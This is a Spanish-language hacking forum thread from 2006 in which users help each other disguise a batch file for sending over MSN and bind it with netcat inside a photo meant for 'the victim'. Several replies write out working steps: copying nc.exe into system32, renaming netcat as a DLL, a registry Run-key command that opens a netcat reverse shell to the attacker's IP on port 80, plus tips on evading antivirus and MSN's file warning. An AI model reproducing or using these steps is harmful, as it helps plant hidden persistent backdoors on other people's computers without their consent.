Páginas: [1]
|
 |
|
Autor
|
Tema: camuflar un .bat (Leído 1082 veces)
|
stradivariuss
|
Buenos dias family.. Me gustaria saber si ahi alguna forma de poder mandar un bat a través del msn,pues lo intento y no me deja por motivos de seguridad,como podria camuflarlo? Gracias de antemano.
|
|
|
|
|
|
|
|
|
GroK
...I have become comfortably numb...
|
Pues tienes varias maneras: - Lo comprimes; - Lo conviertes a EXE y lo bindeas con otro ejecutable (busca sobre Quick Batch File Compiler); - Usas lo de los 3 puntitos al final del nombre
En fin, a tu gusto
Saludos
|
|
|
|
|
|
"I put on my Hendrix album and my son said 'Dad, who's that?' and i said 'Well son, that's God' "- Robert Plant
|
|
|
Karcrack
Se siente observado ¬¬'
|
Que es... - Usas lo de los 3 puntitos al final del nombre Podrias explicar please 
|
|
|
|
|
|
|
|
|
satan69
|
Que es... - Usas lo de los 3 puntitos al final del nombre Podrias explicar please  . yo tambien queria saber eso..????
|
|
|
|
|
|
|
|
|
Deka_10
|
son los 3 puntitos para buscar archivos, o eso creo.
|
|
|
|
|
|
Islam != Terrorism
|
|
|
GroK
|
 Saludos
|
|
|
|
|
|
"I put on my Hendrix album and my son said 'Dad, who's that?' and i said 'Well son, that's God' "- Robert Plant
|
|
|
Karcrack
Se siente observado ¬¬'
|
Gracias por la info lo probare y os cuento MOD:Funciona!!!!!, el msn no dice lo de que el archivo es peligroso para enviarlo!!!
|
|
|
|
« Última modificación: 19 Noviembre 2006, 13:27 por Karcrack »
|
|
|
|
|
Deka_10
|
a mi lo k me gustaria saber escomo bindear un batch + netcat + foto y k al abrir la foto ejecute el batch, el batch lo k hace es copiar el netcat a system32 y agregar una llave al registro. Pero claro, el batch no podra encontrar al netcat prk estaran en el mismo archivo bindeado. hay alguna manera d ehacer lo k digo?
|
|
|
|
|
|
Islam != Terrorism
|
|
|
aurican
|
ostia grok yo eso no lo sabia, jejej me lo apunto porque es bueno
|
|
|
|
|
|
|
|
|
GroK
|
Claro que se puede mira: 1.- Te pillas un binder, por ejemplo MSB (pa hacerle publicidad xD), te lo puedes bajar de http://www.kizar.net/foro/index.php?topic=131.0
2.- Haces un bat con esto: @echo off copy /y ".\nc.exe" "%systemroot%\system32\nc.exe" exit
Bueno si kieres lo del registro agregaselo despues del copy.
3.- Configuras MSB de esta forma: 
Y listo, le mandas ese archivo a la victima y vera la foto, el batch hara que netcat se copie a system32 y q se agregue al registro, que haga shell o lo que tu kieras, ya eso te lo dejo a ti  Espero que te sirva
PD @aurican: jaja pues se ha hablado monton de ese truco aki en el foro, hala a disfrutarlo  Saludos
|
|
|
|
|
|
|
|
|
Deka_10
|
muchas gracias, pero una cosa, los antivirus detectan al nc.exe? yo lo k hago al batch es esto: move /-Y Untitled.jpg C:\WINDOWS\system32\dfk.dll el nc.exe lo mando como foto  y lo camvio por una dll k llamo dfk xD despues agrego una llave al registro como esta: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v dfk /t REG_SZ /d %systemroot%\system32\cmd.exe /c dfk.dll miip 80 | cmd.exe | dfk.dll miip oye no me rula... el batch creo k no se ejecuta. he bindeado todo como dices.
|
|
|
|
« Última modificación: 19 Noviembre 2006, 21:50 por Deka_10 »
|
|
Islam != Terrorism
|
|
|
octalh
"El sueño de la razón produce monstruos"
|
no uses blinders los AV te van a detectar usa winrar para comprimir un exe y le indicas que ejecute de forma oculta tu bat.
si la intencion es que el bat se ejecute a diario de forma oculta crea un bucle en RUN ONCE
salu2 y suerte
|
|
|
|
|
|
|
|
|
Deka_10
|
una cosa, en mi script algo va mal :S no me agrega llaves en el registro, me da un error como este: "too many command-line parametres" pero el move lo hace bien. ayuda plz. como dices k hago lo del winrar? como hago k se ejecute ocultamente? lo unico k se me ocurre es un joiner :S Gracias.
|
|
|
|
|
|
Islam != Terrorism
|
|
|
GroK
|
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v dfk /t REG_SZ /d %systemroot%\system32\cmd.exe /c dfk.dll miip 80 | cmd.exe | dfk.dll miip
Pon entre comillas la ultima parte, asi: REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v dfk /t REG_SZ /d "%systemroot%\system32\cmd.exe /c dfk.dll miip 80 | cmd.exe | dfk.dll miip" Si no va a considerar los espacios como otros parametros. Lo del winrar, tal vez te sirva este tutorial: (esta en ingles) http://forums.chasenet.org//index.php?download=14 ; abajo del todo le das donde dice 'I agree, download now'. Y si por casualidad necesitas registrarte pos t registras Saludos
|
|
|
|
|
|
|
|
|
|
Páginas: [1]
|
|
|
|